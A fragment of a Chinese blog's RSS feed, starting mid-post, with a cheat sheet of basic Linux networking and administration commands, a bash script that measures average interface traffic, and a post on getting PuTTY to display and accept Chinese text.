getconf LONG_BIT</p>
<p>#————————————————————————<br />
# 基本设置<br />
#————————————————————————</p>
<p># 设置主机名<br />
vi /etc/sysconfig/network<br />
HOSTNAME=centos<br />
reboot system…</p>
<p># ifconfig eth0 192.168.4.222 netmask 255.255.255.0<br />
# ifconfig eth0:0 10.0.0.1 netmask 255.0.0.0<br />
# ifconfig eth0 down<br />
# ifconfig eth0 on</p>
<p># 更改网卡MAC地址<br />
ifconfig eth0 hw ether 00:37:A6:C4:68:E3</p>
<p># route命令设置网关<br />
route add default gw 192.168.4.3<br />
route del default gw 192.168.4.1</p>
<p># 查看端口信息<br />
netstat -atn</p>
<p># 查看路由表<br />
netstat -r</p>
<p># 查看网络接口状态<br />
netstat -i</p>
<p># 查看谁占用80端口<br />
lsof -i:80</p>
<p>——————————————————————–</p>
<p># 增加环境变量</p>
<p>echo “export PATH=$PATH:/usr/local/mysql/bin” &gt;&gt; /etc/profile  //永久修改的<br />
source /etc/profile</p>
<p>——————————————————————–</p>
<p>系统默认为美国东部时间，修改Linux时区为东八区<br />
cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime<br />
date -s “20090101″<br />
clock -w  或  hwclock<br />
——————————————————————–</p>
<p>#————————————————————————<br />
# Linux流量监控<br />
#————————————————————————<br />
iftop工具</p>
<p>用途: 用来即时监看网路状态和各ip所使用的频宽</p>
<p>执行(必须以root身份)<br />
监控eth1的网卡的流量<br />
# iftop -i eth1</p>
<p>以位元组(bytes)为单位显示流量(预设是位元bits):<br />
$ iftop -B</p>
<p>直接显示IP, 不进行DNS反解:<br />
$ iftop -n</p>
<p>直接显示连接埠编号, 不显示服务名称:<br />
$ iftop -N</p>
<p>显示某个网段进出封包流量<br />
$ iftop -F 192.168.1.0/24 or 192.168.1.0/255.255.255.0</p>
<p>其他参数可下 iftop -h 看说明.</p>
<p>进入iftop画面时, 可按 p 切换是否显示连接埠, n 切换显示IP或主机的domain name, N切换显示连接埠代号或名称, p暂停显示, b切换是否显示长条, B切换计算几秒内的平均流量, 其他按键可以按h观看说明.<br />
設定檔的位置在~/.iftoprc , 關於設定檔的寫法可以參考 iftop 的 info page.</p>
<p>nload<br />
用途: 用来即时监看网路状态和各ip所使用的频宽(很废话了)<br />
nload默认的是eth0网卡，如果你想监测eth1网卡的流量<br />
#nload eth1</p>
<p>nload默认分为上下两块：上半部分是：Incoming也就是进入网卡的流量，下半部分是：Outgoing，也就是从这块网卡出去的流量，每部分都有当前流量（Curr），平均流量（Avg），最小流量（Min），最大流量（Max），总和流量（Ttl）这几个部分，看起来还是蛮直观的。<br />
另外，你也可以自己定义流量数值显示的单位<br />
#nload –help<br />
就可以看到具体的相关参数了。</p>
<p>查看网络平均流量</p>
<p>下面的脚本可以很好的监控你的网络的平均流量,你可以提定时间<br />
#!/bin/bash<br />
echo -n “which nic?”<br />
read eth<br />
echo “the nic is “$eth<br />
echo -n “how much seconds:”<br />
read sec<br />
echo “duration is “$sec” seconds, wait please…”<br />
infirst=$(awk ‘/’$eth’/{print $1 }’ /proc/net/dev |sed ‘s/’$eth’://’)<br />
outfirst=$(awk ‘/’$eth’/{print $10 }’ /proc/net/dev)<br />
sumfirst=$(($infirst+$outfirst))<br />
sleep $sec”s”<br />
inend=$(awk ‘/’$eth’/{print $1 }’ /proc/net/dev |sed ‘s/’$eth’://’)<br />
outend=$(awk ‘/’$eth’/{print $10 }’ /proc/net/dev)<br />
sumend=$(($inend+$outend))<br />
sum=$(($sumend-$sumfirst))<br />
echo $sec” seconds total :”$sum”bytes”<br />
aver=$(($sum/$sec))<br />
echo “avrage :”$aver”bytes/sec”</p>
<p>&nbsp;</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1920.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>让putty支持中文输入和显示</title>
		<link>http://www.4shell.org/archives/1919.html</link>
		<comments>http://www.4shell.org/archives/1919.html#comments</comments>
		<pubDate>Fri, 29 Apr 2011 20:25:09 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[putty]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1919</guid>
		<description><![CDATA[对于经常在windows下远程ssh到linux的用户而言，putty可能是你最好的选择。 可是缺省情况下，putty对中文的支持却让人不敢恭维，如果远程linux的locale设置为zh_CN.*(bg2312,gbk,utf8等等），显示就是乱码。 经研究发现，其实putty的中文支持还是很好的，呵呵 打开putty主程序，选择window-〉Appearance-〉Font settings-〉Change…,选择Fixedsys字体,字符集选择CHINESE_GB2312。 在window-〉Appearance-〉Translation中，Received data assumed to be in which character set 中,把Use font encoding改为UTF-8. 如果经常使用,把这些设置保存在session里面. 现在打开putty,登录成功后,在shell中输入:export LC_ALL=’zh_CN.utf8′,现在已经可以完美的支持中文了 可以打开vim输入中文测试一下,而且也不会出现删除半个汉字的问题. &#160; 相关文章2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项2011年11月24日 -- linux Backdoor2011年11月24日 -- allinone: Linux pentest tools2011年06月10日 -- VMware 硬盘扩容2011年06月6日 -- Linux下MySQL的load_file常用路径2011年06月6日 -- linux渗透小技巧2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images2011年04月30日 -- [...]]]></description>
			<content:encoded><![CDATA[<p>对于经常在windows下远程ssh到linux的用户而言，putty可能是你最好的选择。<br />
可是缺省情况下，putty对中文的支持却让人不敢恭维，如果远程linux的locale设置为zh_CN.*(bg2312,gbk,utf8等等），显示就是乱码。<br />
经研究发现，其实putty的中文支持还是很好的，呵呵</p>
<p><span id="more-1919"></span></p>
<p>打开putty主程序，选择window-〉Appearance-〉Font settings-〉Change…,选择Fixedsys字体,字符集选择CHINESE_GB2312。<br />
在window-〉Appearance-〉Translation中，Received data assumed to be in which character set 中,把Use font encoding改为UTF-8.<br />
如果经常使用,把这些设置保存在session里面.</p>
<p>现在打开putty,登录成功后,在shell中输入:export LC_ALL=’zh_CN.utf8′,现在已经可以完美的支持中文了<br />
可以打开vim输入中文测试一下,而且也不会出现删除半个汉字的问题.</p>
<p>&nbsp;</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1919.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

